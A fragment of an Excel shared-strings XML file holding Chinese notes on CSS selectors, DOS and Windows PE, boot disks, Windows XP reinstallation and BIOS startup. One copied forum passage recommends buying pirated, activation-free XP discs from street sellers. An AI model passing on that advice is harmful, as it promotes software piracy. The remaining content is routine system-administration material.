      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文档的某一部分，通常为文件头部分。将内容与表现形式分离，</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不仅可使维护站点的外观更加容易，而且还可以使</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文档代码更加简练，缩短浏览器的加载时间。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> ID</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　类选择符</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包含选择符</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.2 大小写快捷键切换：选定文本区域---shift+F3:英文在首字母大写、全大写、全小写之间快速切换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.10 shift+F3:英文在首字母大写、全大写、全小写之间快速切换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>～$文档&amp;保存自动恢复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2．在Word中播放视频电影(.flv、.rmvb)windows media player播放器；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sn</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>名称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>功能描述</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dos and PE可以在光驱上运行，windows7必须安装到硬盘上才可以运行；即可以利用DOS或PE启动盘对电脑硬盘进行操作；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PE，</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows PE</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> = Windows PreInstallation Environment，Windows预安装环境，微软在2002年7月22日发布，带有限服务的最小Win32子系统，基于以</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>保护模式</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>运行的Windows XP Professional内核。</t>
    </r>
  </si>
  <si>
    <t>最基本的DOS系统，由一个基于MBR[1]的BOOT引导程序和三个文件模块组成。这三个模块是：输入输出模块(IO.SYS)、文件管理模块(MSDOS.SYS)及命令解释模块(COMMAND.COM)。[2]除此之外，微软还在零售的DOS系统包中加入了若干标准的外部程序(即外部命令)，这才与内部命令(即由COMMAND.COM解释执行的命令)一同构建起一个在磁盘操作时代相对完备的人机交互环境。有关DOS的各种命令，请参见DOS命令列表。</t>
  </si>
  <si>
    <t>dos</t>
  </si>
  <si>
    <t>命令提示符是WINXP兼容DOS的命令符输入窗口</t>
  </si>
  <si>
    <t>DOS命令分内部命令和外部命令,内部命令的程序都包含在COMMAND.COM文件中,在启动DOS时就已装入内存.DOS的外部命令都是以扩展名为COM或EXE的可执行文件.</t>
  </si>
  <si>
    <t>执行方式</t>
  </si>
  <si>
    <t>　　执行DOS命令有两种方式,一种是人机交互式,用户在DOS界面输入一个命令,DOS就执行一个命令,然后回到DOS操作系统提示符.另一种是程序工作方式,把一批命令组成一个扩展名为BAT的批处理命令.</t>
  </si>
  <si>
    <r>
      <t>进入系统分区的根目录（在Windows98和WindowsXP双系统环境下，Windows98所在的那个分区是你的启动分区），然后点击“工具”菜单的“文件夹选项”子菜单，选择“查看”选项卡，去掉“隐藏受保护的操作系统文件”前的小勾，此时会弹出一个警告的对话框，选择“是”按钮，再选择“隐藏文件和文件夹”中的“显示所有文件和文件夹”，然后依次点击“应用”、“确认”按钮。此时你的系统分区根目录中会多出几个隐藏文件，找到</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>ntldr、ntdetect.com和boot.ini</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>这三个文件，将它们拷贝到软盘里，这样就做好了一张</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>WindowsXP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>的启动盘，大小大约有200KB左右。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启动引导盘的作用，即首先启动系统到DOS状态下;</t>
  </si>
  <si>
    <t>启动盘</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　微软的操作系统版本众多，对于不同的操作系统而言，它的启动盘特性及用途也各不相同。而微软对启动盘的叫法也似乎有点混乱，如</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急启动盘</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Emergency Startup Disk)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、紧急引导盘</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Emergency Boot Disk)</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、紧急修复磁盘（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Emergency Repair Disk</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ERD</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）、安装启动盘、系统</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>引导盘</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等。另外不少杀毒软件，如</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF3366CC"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金山毒霸</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>KILL</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>KV3000</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等也提供创建应急杀毒启动盘等。这些不同类型的所谓启动盘之间有何区别和用途，本文将就几个主要类型的操作系统的启动盘特性作一阐述。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1 任务栏空白处右击---toolbar---new:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>C:\Users\wwu\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>;or:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF002060"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>%userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>at</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>telnet</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ftp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>copy</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>set</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NET</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  a </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动安装：安装过程全部自动化，直至进入桌面，默认以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Administrator </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  b </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动安装：安装过程除了不需要输入序列号，其他跟原版一样，首次进入系统会进入创建网络连接以及创建用户帐户页面，建议立刻给</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Administrator </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>账号设置密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首先用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Nero </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的刻录镜像文件刻录本</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> ISO </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>详细操作请看录像文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，然后在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Bios </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中设置光驱优先启动，放入光盘重启后即可安装。当出现光盘引导菜单后，根据自己需要选择适合的安装方式。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  a </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动安装：首先提取</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> ISO </t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> SYSTEM\MSDN(SATA)\I386 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中的所有内容到硬盘根目录，比如</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> D:\I386</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。然后运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> D:\I386\win.bat </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装即可。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  b </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动安装：开始步骤同上，最后运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> D:\I386\winnt.bat </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装即可。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首先下载</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> PE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（下载地址：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>http://soft.ylmf.com/downinfo/882.html</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>），然后</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重启系统进入</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> PE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> PE </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自带的虚拟光驱加载</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> ISO </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件，接着格式化</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> C </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘，最后运行虚拟光驱中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Setup.exe </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进行安装即可。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在Windows环境下不能格式化系统分区</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>  只要Windows系统启动起来，在系统盘（一般是C：盘，也可自定义）上就有一些系统文件被锁定为不可移动或删除。Windows下的格式化命令是图形界面的Windows程序，这种程序是Windows操作系统的附属工具，离开Windows操作系统就无法运行，所以它不能格式化它的“上级”系统程序所在的磁盘分区。只要不是系统分区，别的分区都可以轻松地对之进行格式化的操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>  答：想办法进入DOS，比如用Windows的启动光盘。进入DOS命令行界面后，使用 FORMAT X：（把X：换成任意字母+半角冒号）即可。也可用其他第三方磁盘管理工具比如PQ Magic等。这些磁盘分区软件，可以在分区的同时对当前分区进行格式化。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>  说实话，我不知道题目应该怎么说，我的意思是我把自己重装系统的一点心得和大家分享。知道论坛中有不少高手高高手，我写这个也只是为了给那些害怕自己装系统的朋友准备的，如果有不对的地方，还请大家多多讨论指教。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>  前提：我主要是说装xp的步骤，如果是98，先准备好启动盘。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>最起码的是一个xp安装盘，要那种可以光盘启动的，要么是正版，要么是盗版的企业版，大街上很多，写着什么政府啦企业啦免激活啦的那种。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 进入安装程序，按照提示安装，中间会有分区和格式化的步骤。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 建议c盘格式化成FAT32。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 中间会重启一次，那次就不要在启动的时候按任意键了，否则又重新装一遍。需要做的就是nothing，让电脑跳过那个步骤，然后会直接进入安装进程。大约一个小时之后，安装完成。连上网线，xp会自动设置网络。之后你需要设置一下用户名什么的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 初始设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>   6 .不要赶着凑正好1分钟　</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　自检通过后，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将查找显示卡的</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，由显卡</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>来完成显示卡的初始化，显示器开始有显示</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，自此，系统就具备了最基本的运行条件，可以对主板上的其它部分进行诊断和测试，再发现故障时，屏幕上会有提示，但一般不死机，接着系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将检测</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的类型和工作频率，然后开始测试主机所有的内存容量，内存测试通过之后，系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将开始检测系统中安装的一些标准硬件设备，这些设备包括：硬盘、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、软驱、串行接口和并行接口等连接的设备，大多数新版本的系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在这一过程中还要自动检测和设置内存的相关参数、硬盘参数和访问模式等。　　</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　以从</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘启动为例，系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
